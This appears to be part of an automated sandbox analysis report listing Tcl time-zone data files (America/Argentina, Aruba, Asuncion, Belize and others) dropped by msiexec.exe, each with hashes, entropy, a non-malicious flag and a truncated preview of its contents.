                                                                                                                                SSDEEP:48:5CPBuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwGSmSc8OSI:GUu3pfe92jCs/VOHv2kdeRtnxafwGJld
                                                                                                                                MD5:F6CB24E8567B2443224E9E17EE438BFE
                                                                                                                                SHA1:8029426C30C4C645EA77C6240391CDB1C3107568
                                                                                                                                SHA-256:DC39400BBFD5BDDDC174FE099194806FBFD3FC3AA20E670D67BE0AC35FE97AD4
                                                                                                                                SHA-512:6869CFC24C21FBB2DFCCAA9AE7E21A0B24DC002EE792FB28A8F2F05C75C20E93C95A39BD8653AA272AF10FE95922B99EECC1208AACE814817D9441F84360E867
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Mendoza) {.. {-9223372036854775808 -16516 0 LMT}.. {-2372095484 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-752274000
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2080
                                                                                                                                Entropy (8bit):3.7580685839169545
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:5oQuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwwfFC8OS0NC:qBu3pfe92jCs/VOHv2kdeRtnxafwwfFP
                                                                                                                                MD5:212D13CE27AF114A8EC2E04023D218C4
                                                                                                                                SHA1:C4C5F86BC6EC0D5EA4C9CF199309D085767B97E8
                                                                                                                                SHA-256:A05B6708DEFF0607396BFC6661C2287341C3432841AE353D94A67AC742B5FAFA
                                                                                                                                SHA-512:CE7201EEA6A86FB49641410D2EEE4030EDB1B96F3218D764762F5AE23883C796F5742ED69CEC985A9D3582D6C72ED74114DE81508F6DEB4B54865B6974ADC965
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Rio_Gallegos) {.. {-9223372036854775808 -16612 0 LMT}.. {-2372095388 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-7522
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2011
                                                                                                                                Entropy (8bit):3.7415813345133975
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:5NPuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafww3mC8OS0wF:72u3pfe92jCs/VOHv2kdeRtnxafww3mz
                                                                                                                                MD5:A06C33CDFD7E7B630CB1DF34E72E61E5
                                                                                                                                SHA1:694826B9B910DA0BD70A9CB547C26E6838B08111
                                                                                                                                SHA-256:CAEFC60F2F36EF9FFE0C5921C3C392DE1E95755683A96C1C4EC0BA2C242A4D84
                                                                                                                                SHA-512:D6696A6C14EECF2B77EC586F40137BDD95E5CE5C5193570C809FAB9E5FCA4B8744283CEB6818E525C73F6EFF657274410B2622902EE8C15912C8D5F5FA5C805E
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Salta) {.. {-9223372036854775808 -15700 0 LMT}.. {-2372096300 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-752274000 -
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2106
                                                                                                                                Entropy (8bit):3.747934819596411
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:5vXxuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwwkFC8OS0K:hUu3pfe92jCs/VOHv2kdeRtnxafwwkFl
                                                                                                                                MD5:32A50D0ABF408D9E59C0580D5B8CC472
                                                                                                                                SHA1:EA5BB8860982F8BAFEAEFDE1D6ACD440DA132DFE
                                                                                                                                SHA-256:41B2C25E42146A76934B866061BB3245B8ADA0FF4E1BFBA6F8842A30BDD5C132
                                                                                                                                SHA-512:E5D2521A4EF53AAD3E74506708EC2768C4D2EE8D6D014DCCF4A6DC290B713B4D46021B66527548C35004E10D753E1B685EEFD55BBE7BF01EC6104D7D8AAC4403
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/San_Juan) {.. {-9223372036854775808 -16444 0 LMT}.. {-2372095556 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-75227400
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2081
                                                                                                                                Entropy (8bit):3.7399269084699975
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:5MDuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafw6bS2nZSbdI:yCu3pfe92jCs/VOHv2kdeRtnxafwWnZr
                                                                                                                                MD5:FB06B66F5D41709C7E85C8B1E9BFCFA0
                                                                                                                                SHA1:D5C0C4B12C6190856C300321B1C106C7474BA54B
                                                                                                                                SHA-256:A43B35F25E54EF359D046E33281C0A978F0EE8811C93A6809F1F65750878BBB6
                                                                                                                                SHA-512:D445F46D6A17A075AD995885E45234A711F53BF3FE2DFC6DFBB611E8AC154B10C91E137927DD66D6A7C596A93BAE5DE283796F341B5095FA0DD05595E1C3A077
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/San_Luis) {.. {-9223372036854775808 -15924 0 LMT}.. {-2372096076 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-75227400
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2105
                                                                                                                                Entropy (8bit):3.741704529449777
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:5yZujuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafww3mC8OSf:suiu3pfe92jCs/VOHv2kdeRtnxafww3w
                                                                                                                                MD5:D9497141EC0DC172E5FF5304FED0BE6B
                                                                                                                                SHA1:CD20A4F0C127A84791093010D59DF119DD32340A
                                                                                                                                SHA-256:0F7DB23E1280FC19A1FB716E09A9699ADA2AAE24084CAD472B4C325CC9783CCF
                                                                                                                                SHA-512:0B71952055013CD6045ED209FD98168083550655FAB91B7870C92098E40C4FE6827EAAF922D34ECE28298CBB14327A76AD6780D480E552F52F865AA11A4AA083
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Tucuman) {.. {-9223372036854775808 -15652 0 LMT}.. {-2372096348 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-752274000
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2075
                                                                                                                                Entropy (8bit):3.7445758155279836
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:5SHuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwwfFC8OS0jE:YOu3pfe92jCs/VOHv2kdeRtnxafwwfFn
                                                                                                                                MD5:16A89FD2CDEE50E534301A9797311A9D
                                                                                                                                SHA1:4A4EBA1798214C7CF5ACDC0B2EC8B4716CD968CB
                                                                                                                                SHA-256:10B6FF51314D8EE1D010187D8805C4E3D71B778BC6DECB26E66193A5BB3E9EA2
                                                                                                                                SHA-512:DBB0BA3F8AA2B54C86EA8B6530C16DF95AF1331FC5F843B113A204DA20B8EF011FE93C27EB917D01B9040D4914057687B4AACCD292A847559AF69150D1BDC4B5
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Ushuaia) {.. {-9223372036854775808 -16392 0 LMT}.. {-2372095608 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-752274000
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):199
                                                                                                                                Entropy (8bit):4.893042770292303
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290/V90ppv:MByMYbpwt290/V90b
                                                                                                                                MD5:CC015E3E5D3293CAA1348B4E0EE5795C
                                                                                                                                SHA1:75E7EFD905C9001CE9CA5872DA3915A19BCB00E0
                                                                                                                                SHA-256:7490CD66408B8A14C549278FE67DC3338FE9E458F423F01CCBEA00B5E6F6CEF6
                                                                                                                                SHA-512:66523F050E4A42A1C9FC8C02B822CD3864A6E35F6364FB6A675F2A503BD8030FE6E380B252068668A79A6593B5042520EE40700DA033517742B3F0ED33D79DAF
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Aruba) $TZData(:America/Puerto_Rico)..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):7944
                                                                                                                                Entropy (8bit):3.5156463862656775
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:j7RXBXLqbvdvZsV4GGdzVUFg7XaMOhKpJq3o5GMJq90vRFhjGF3RxTBhcXBACBLo:jEJgXh
                                                                                                                                MD5:181203CAD98E94355B9914A205514904
                                                                                                                                SHA1:D361CB53955437270905A9432DE9E7F6C1AE7189
                                                                                                                                SHA-256:EAEFE21276EE60C7F876C1D65039999AC069339DCDB82A23FC9206C274510575
                                                                                                                                SHA-512:AE9262DFC35579AEB610DF8BB5F7FBB49232195F55F78402405017681F72C0D2A09FA9EB605B406065A1F44FE6785AC0163870C921DAFFC4746DA6EDA3081521
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Asuncion) {.. {-9223372036854775808 -13840 0 LMT}.. {-2524507760 -13840 0 AMT}.. {-1206389360 -14400 0 -04}.. {86760000 -10800 0 -03}.. {134017200 -14400 0 -04}.. {162878400 -14400 0 -04}.. {181368000 -10800 1 -04}.. {194497200 -14400 0 -04}.. {212990400 -10800 1 -04}.. {226033200 -14400 0 -04}.. {244526400 -10800 1 -04}.. {257569200 -14400 0 -04}.. {276062400 -10800 1 -04}.. {291783600 -14400 0 -04}.. {307598400 -10800 1 -04}.. {323406000 -14400 0 -04}.. {339220800 -10800 1 -04}.. {354942000 -14400 0 -04}.. {370756800 -10800 1 -04}.. {386478000 -14400 0 -04}.. {402292800 -10800 1 -04}.. {418014000 -14400 0 -04}.. {433828800 -10800 1 -04}.. {449636400 -14400 0 -04}.. {465451200 -10800 1 -04}.. {481172400 -14400 0 -04}.. {496987200 -10800 1 -04}.. {512708400 -14400 0 -04}.. {528523200 -10800 1 -04}.. {544244400 -14400 0 -04}.. {5
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):187
                                                                                                                                Entropy (8bit):4.791603790249234
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0u55DyXHAIg20u5cvRL/2IAcGE/qlOi+4IAcGEu5B:SlSWB9vsM3y7oDSHAIgpdN/290/qlf+M
                                                                                                                                MD5:5A45B70C79F533548B3DD332F988E15B
                                                                                                                                SHA1:C7485828619A1D4F5CA59D80ABD197100AC58F64
                                                                                                                                SHA-256:518BEB6E54AE811F8C725EA8CC42787D48FC605A3476D6E7A00A1B5733CBD6AC
                                                                                                                                SHA-512:A81C2EBE282E019ED011EADDB8F74C3E6FBE88D87E8D8706B3022CDCC48EF92AD90F9BCF9F25031664BB6EFE069EAFDD23D9B55BF672FC7528A2DD8CB6B986B4
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Panama)]} {.. LoadTimeZoneFile America/Panama..}..set TZData(:America/Atikokan) $TZData(:America/Panama)..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):177
                                                                                                                                Entropy (8bit):4.812527147763069
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0/yO5WXHAIg20/yOoNvWARL/2IAcGE/ol7x+IAcGs:SlSWB9vsM3y7/yrHAIgp/yH0AN/290/e
                                                                                                                                MD5:13479F64BFBDC7583C637E1562C454B4
                                                                                                                                SHA1:2F59484C779B0D6033FC14E205DA9BCAB7A5FCB1
                                                                                                                                SHA-256:1D6FEE336E71FFFB64874A830C976867C071EBF6B133C296B32F87E3E7D814C9
                                                                                                                                SHA-512:D2C5D35BBBDAB8D58BF6185328124796C06B67ADFB4C1828BA5A9CCA500A01BB8BE69635AE7EEA7FA837A27B20D488A08A29B121DD1617BC373390AD95D67E39
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Adak)]} {.. LoadTimeZoneFile America/Adak..}..set TZData(:America/Atka) $TZData(:America/Adak)..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2012
                                                                                                                                Entropy (8bit):3.703391569010329
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:5/ChlvEw6kSSx5H4a8tf3fku+da2XUd23t8VZDG8+GyOd:VIlvEwJSSxdF8tfMu+da2kdCt8VZy8+K
                                                                                                                                MD5:69DCC2477D8D81E2F49D295DB6907190
                                                                                                                                SHA1:3C6ED0CEF15D3265C962873480EE1809A4DCACA2
                                                                                                                                SHA-256:64F1EC14F6B43FF10B564F839152E88DF9262F0947D1DB347557FA902F6FD48C
                                                                                                                                SHA-512:71DEA6D47F267AA7326A011872FA74762FA4F8CD57EB149E3B56B3DE9097B0B9258BC4F6C29188B49FC60C1942869B92D9E59FEE6980A5DA5D0029C383D99F39
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Bahia) {.. {-9223372036854775808 -9244 0 LMT}.. {-1767216356 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):6847
                                                                                                                                Entropy (8bit):3.8753284304113196
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:5pUSdFS1Y3FUlWQnH7eelN5Lh9LY5LpfLyZ3Moonskfm10qNKAqyQUrBbp7uos6u:DG1sehpYtpjyrz7nKED4KPddGEYA/Gx
                                                                                                                                MD5:E7EF08880C64C898BB7A5266EBF1A47A
                                                                                                                                SHA1:E2D2F36961C9CADB2736FFAF2DBA9A1F4B372DBD
                                                                                                                                SHA-256:B24AE5FA20F5329644529F660EEC8BAA3B966F9730AF58F1C21E94C02AE17228
                                                                                                                                SHA-512:6C47D875682CCE8B769EB0458CEC20FB8D4950A70D6904A32CED803D30F8B407828D7A12B4F560CF6B86541E985817B4394F9AEAAFEAA80593B5B42BA92D38CB
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Bahia_Banderas) {.. {-9223372036854775808 -25260 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 0 CST}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {-873828000 -25200 0 MST}.. {-661539600 -28800 0 PST}.. {28800 -25200 0 MST}.. {828867600 -21600 1 MDT}.. {846403200 -25200 0 MST}.. {860317200 -21600 1 MDT}.. {877852800 -25200 0 MST}.. {891766800 -21600 1 MDT}.. {909302400 -25200 0 MST}.. {923216400 -21600 1 MDT}.. {941356800 -25200 0 MST}.. {954666000 -21600 1 MDT}.. {972806400 -25200 0 MST}.. {989139600 -21600 1 MDT}.. {1001836800 -25200 0 MST}.. {1018170000 -21600 1 MDT}.. {1035705600 -25200 0 MST}.. {1049619600 -21600 1 MDT}.. {1067155200 -25200 0 MST}.. {1081069200 -21600 1 MDT}.. {1099209600 -25200 0 MST}.. {1112518800 -21600 1 MDT}.. {1130659200
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):648
                                                                                                                                Entropy (8bit):4.251560000277241
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:MB86290eWmdH9Colj/uFkv/lC1/uFkOzQs/lps/Ozfah/OzT/lN/uFkX/ll/uFki:5TWeUo5Skv/Y1SkA/g/Bh/m/rSkX/zSt
                                                                                                                                MD5:DC4FA44B2174A4E6F0644FA8EA2E83F9
                                                                                                                                SHA1:C12DF8C862A05D569EAF189272F8BF44303595A1
                                                                                                                                SHA-256:FD5E04136506C6543A9ACDC890A30BCF0D561148E1063EC857E3913DE1EBA404
                                                                                                                                SHA-512:5AC307CD48132B57215CCBAF0BB63F7FA9C5B28DC9F6217C905885D75B0DF131238D4DB2AE707C3DDEE2EDE6C0914644B435FB1CDD9913600D8B69AE95578B0F
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Barbados) {.. {-9223372036854775808 -14309 0 LMT}.. {-1841256091 -14400 0 AST}.. {-874263600 -10800 1 ADT}.. {-862682400 -14400 0 AST}.. {-841604400 -10800 1 ADT}.. {-830714400 -14400 0 AST}.. {-820526400 -14400 0 -0330}.. {-811882800 -12600 1 AST}.. {-798660000 -14400 0 -0330}.. {-788904000 -14400 0 AST}.. {234943200 -10800 1 ADT}.. {244616400 -14400 0 AST}.. {261554400 -10800 1 ADT}.. {276066000 -14400 0 AST}.. {293004000 -10800 1 ADT}.. {307515600 -14400 0 AST}.. {325058400 -10800 1 ADT}.. {338706000 -14400 0 AST}..}..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1031
                                                                                                                                Entropy (8bit):3.8842563546204225
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:5fe300cChlrLPsw6kSS3h5R14eH8tf3xd:5+CChlvEw6kSSx5H4a8tf3xd
                                                                                                                                MD5:DFA5E50F6AEF1311A4CF74970477E390
                                                                                                                                SHA1:5B63676EB8039B2BE767BAA44820F2DAE5B62876
                                                                                                                                SHA-256:549625CCB30BD0E025BAC47668BA3AA0CDD8569E5887E483C8D62B5B7302FA50
                                                                                                                                SHA-512:4BBB43694E3B54339C549AC3A5488B77366DB1189D8D1834DCF618D9448084A950B575E207064521B1CDFD2E41F7D1D8C5CD9CEB4668D4459585649556136EB0
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Belem) {.. {-9223372036854775808 -11636 0 LMT}.. {-1767213964 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3284
                                                                                                                                Entropy (8bit):3.8546064195941097
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:5pKSxZwR9IVQU55DG5krgGN8wW+YeD1yyfCwoc:HKSjgIVzrG5krRN8wWheD1yu
                                                                                                                                MD5:4DA622B685B3B075CC94FC4E23322547
                                                                                                                                SHA1:DEB23F0A434549DAE1BE60ACF757BB212C907B92
                                                                                                                                SHA-256:E07F45264E28FD5AA54BD48CB701658509829CF989EC9BD79498D070A1BA270F
                                                                                                                                SHA-512:9B00BF8870BC4AAEF7F06FCDFEEEF54686A2CC890103696631EB4DEF5AEEAD051EC9069D70A2B22397F18C0067E03A54E75DA18474D6B1BD3BDA2D5313E0AD16
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Belize) {.. {-9223372036854775808 -21168 0 LMT}.. {-1822500432 -21600 0 CST}.. {-1616954400 -19800 1 -0530}.. {-1606069800 -21600 0 CST}.. {-1585504800 -19800 1 -0530}.. {-1574015400 -21600 0 CST}.. {-1554055200 -19800 1 -0530}.. {-1542565800 -21600 0 CST}.. {-1522605600 -19800 1 -0530}.. {-1511116200 -21600 0 CST}.. {-1490551200 -19800 1 -0530}.. {-1479666600 -21600 0 CST}.. {-1459101600 -19800 1 -0530}.. {-1448217000 -21600 0 CST}.. {-1427652000 -19800 1 -0530}.. {-1416162600 -21600 0 CST}.. {-1396202400 -19800 1 -0530}.. {-1384713000 -21600 0 CST}.. {-1364752800 -19800 1 -0530}.. {-1353263400 -21600 0 CST}.. {-1333303200 -19800 1 -0530}.. {-1321813800 -21600 0 CST}.. {-1301248800 -19800 1 -0530}.. {-1290364200 -21600 0 CST}.. {-1269799200 -19800 1 -0530}.. {-1258914600 -21600 0 CST}.. {-1238349600 -19800 1 -0530}.. {-1226860200 -21600
